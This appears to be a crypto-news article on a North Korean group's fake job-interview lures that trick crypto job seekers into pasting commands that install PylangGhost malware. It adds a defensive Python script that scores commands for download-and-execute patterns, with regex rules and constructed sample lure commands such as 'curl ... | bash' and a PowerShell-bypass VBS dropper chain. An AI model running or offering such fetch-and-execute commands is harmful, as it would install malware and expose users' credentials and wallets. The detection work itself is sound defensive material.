Cisco Talos reported that a North Korean hacking group it tracks as “Famous Chollima” is targeting crypto job seekers in India. According to the report, the group does not appear to be directly related to Lazarus.
At this point it is hard to say whether these campaigns are the main theft or groundwork for a larger attack. Job seekers in the crypto industry should stay alert going forward.
North Korea’s crypto hacks continue
North Korea’s Lazarus Group has a fearsome reputation for cybercrime and committed the biggest hack in industry history. However, North Korea’s involvement in the space runs deep, and Lazarus is not the country’s only Web3 criminal enterprise.
Cisco Talos has identified recent criminal activity targeting India that takes a different approach to crypto theft.
The report notes that Famous Chollima is not new: it has been active since mid-2024. In several recent incidents, North Korean operatives have tried to get inside US-based crypto companies such as Kraken by applying for open job listings.
Famous Chollima inverts that approach, luring prospective workers with fake job applications.
“These campaigns include… creating fake job ads and skill test pages. The latter instructs users to copy and paste the malicious command line to install the drivers needed to carry out the final skill test phase.”
Next to Lazarus’s fearsome reputation, Famous Chollima’s phishing efforts look far clumsier. Cisco noted that the group’s fake applications always mimic well-known crypto companies,
but the lures use none of the real companies’ branding, and the questions asked rarely relate to the job supposedly on offer.

Fake Robinhood application used in hacks. Source: Cisco Talos
Taking the bait
Victims are lured through fake recruitment sites disguised as well-known technology or crypto companies. After filling out the application form, the candidate is invited to a video interview.
During this step the site asks the candidate to run command-line instructions, supposedly to install video drivers, which actually download and install the malware.
Once installed, PylangGhost gives the attacker full control of the victim’s system. It steals login credentials, browser data and crypto wallet information, targeting more than 80 popular browser extensions such as MetaMask, Phantom and 1Password.
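As an added illustration (this is not code from Cisco Talos or from the article), here is a small Python triage script that scores a “paste this into your terminal” instruction for the download-and-execute patterns the lure above relies on: a network fetch, a pipe into an interpreter, a “driver” archive staged in a temp folder, a script launcher, and PowerShell bypass flags. The rule weights and threshold are assumptions to tune per environment, and the sample commands at the bottom are constructed for illustration, not real indicators from the campaign.

```python
"""Heuristic triage for "paste this into a terminal" lure commands.

Added example, not code from Cisco Talos or the article. The rules are
generic download-and-execute heuristics; the sample commands at the bottom
are constructed for illustration and are not indicators from the campaign.
"""
import re

# (rule name, pattern, weight). Weights and THRESHOLD are assumptions to tune.
RULES = [
    # fetches a payload from the network
    ("remote_fetch", r"\b(curl|wget|invoke-webrequest|iwr|certutil|bitsadmin)\b", 2),
    # pipes fetched content straight into an interpreter
    ("pipe_to_interpreter", r"\|\s*(sh|bash|zsh|python3?|iex|invoke-expression|powershell)\b", 3),
    # unpacks an archive (the "driver" bundle)
    ("archive_unpack", r"\b(tar|unzip|expand-archive|7z)\b", 1),
    # launches a script or marks a file executable
    ("launch_script", r"\b(wscript|cscript|mshta)\b|\bchmod\s+\+x\b|\.(vbs|bat|cmd|hta)\b", 2),
    # PowerShell policy bypass / hidden window flags
    ("ps_bypass", r"-(executionpolicy\s+bypass|ep\s+bypass|nop\b|noprofile|w\s+hidden|windowstyle\s+hidden)", 2),
    # disables TLS certificate checking
    ("tls_verify_off", r"(?:^|\s)-k(?:\s|$)|--insecure\b|--no-check-certificate\b", 1),
    # stages files in a temp directory
    ("temp_dropzone", r"%temp%|\$env:temp|/tmp/|appdata\\local\\temp", 1),
    # "video/camera driver" pretext used by the lure
    ("driver_pretext", r"\b(video|graphics?|nvidia|camera|webcam)\b.{0,20}\bdrivers?\b|\bdrivers?\.(zip|exe|sh|pkg|msi)\b", 1),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), weight) for name, pat, weight in RULES]
THRESHOLD = 4  # assumption: a score at or above this is treated as malicious


def triage(command: str) -> dict:
    """Score one command line and return the matched rules and a verdict."""
    hits = [name for name, pattern, _ in COMPILED if pattern.search(command)]
    score = sum(weight for name, _, weight in COMPILED if name in hits)
    if score >= THRESHOLD:
        verdict = "block"
    elif score > 0:
        verdict = "review"
    else:
        verdict = "ok"
    return {"score": score, "hits": hits, "verdict": verdict}


# Constructed sample commands (not real campaign indicators).
SAMPLE_COMMANDS = {
    # Windows-style lure: fetch a "driver" archive, unpack it, run a VBS dropper
    "windows_driver_lure": (
        r'curl -k -o "%TEMP%\nvidia-driver.zip" https://example.invalid/nvidia-driver.zip '
        r'&& powershell -ep bypass -c "Expand-Archive %TEMP%\nvidia-driver.zip %TEMP%\nvdrv; '
        r'wscript %TEMP%\nvdrv\setup.vbs"'
    ),
    # macOS/Linux-style lure: pipe a remote "camera driver" script into bash
    "macos_pipe_to_bash": "curl -fsSL https://example.invalid/camera-driver.sh | bash",
    # Plausible but lower-confidence: fetch and unpack without execution
    "fetch_and_unzip": "wget https://example.invalid/skill-test.zip && unzip skill-test.zip",
    # Benign setup a real take-home test might ask for
    "benign_clone": "git clone https://example.invalid/skill-test.git && npm install && npm test",
}


def triage_all(commands: dict) -> dict:
    """Triage every sample and return {label: verdict}."""
    return {label: triage(cmd)["verdict"] for label, cmd in commands.items()}


if __name__ == "__main__":
    for label, cmd in SAMPLE_COMMANDS.items():
        result = triage(cmd)
        print(f"{label:22} {result['verdict']:7} score={result['score']:2} hits={result['hits']}")
```

The point of the scoring is that no single rule is damning (a legitimate take-home test may well say `git clone` or `unzip`), but a fetch combined with an interpreter pipe, a policy bypass, or a script launcher almost never belongs in a “skill test” and should be refused until someone has read the payload.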
Recently, after thwarting a malware attack, BitMEX said that Lazarus appears to use at least two teams: a lower-skilled team that handles the initial compromise and a higher-skilled team that carries out the subsequent theft. This may be common practice among North Korean hacking units.
Unfortunately, without more evidence any firmer conclusion would be speculation. Is North Korea hacking these applicants in order to better pose as job seekers in the crypto industry?
Job seekers should be wary of unsolicited recruitment, never run commands they do not understand, and protect their systems with endpoint protection, MFA and enhanced browser monitoring.
Always verify the legitimacy of a recruitment portal before sharing any sensitive information.